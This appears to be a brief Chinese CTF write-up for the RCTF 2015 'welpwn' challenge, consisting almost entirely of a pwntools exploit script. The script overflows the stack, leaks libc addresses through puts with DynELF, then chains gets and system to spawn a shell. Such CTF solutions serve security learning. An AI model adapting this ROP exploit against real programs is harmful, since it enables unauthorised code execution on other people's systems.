RCTF 2015 welpwn [ROP] [x64通用gadgets] [简单写法]
https://blog.csdn.net/u011987514/article/details/70232881
按照自己习惯,代码重写一下:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
io = process("./welpwn")
#gadgets
p4r = 0x40089C
pr = 0x4008A3
main = 0x4007CD
puts = 0x4005A0
bss = 0x601070
io.recvuntil("RCTF\n")
def leak(addr):
payload = "A" * 16 + "B" * 8
rop = p64(pr) + p64(addr) + p64(puts) + p64(main)
payload += p64(p4r) + rop
io.sendline(payload)
io.recv(27)
tmp = io.recv()
data = tmp.split("\nWelcome")[0]
if len(data):
return data
else:
return "\x00"
d = DynELF(leak, elf = ELF("./welpwn"))
system = d.lookup("system", "libc")
log.info("system addr = " + hex(system))
gets = d.lookup("gets", "libc")
log.info("gets addr = " + hex(gets))
rop = p64(pr) + p64(bss) + p64(gets) + p64(pr) + p64(bss) + p64(system) + p64(0)
payload = "A" * 16 + "B" * 8 + p64(p4r) + rop
io.sendline(payload)
io.sendline("/bin/sh\x00")
io.interactive()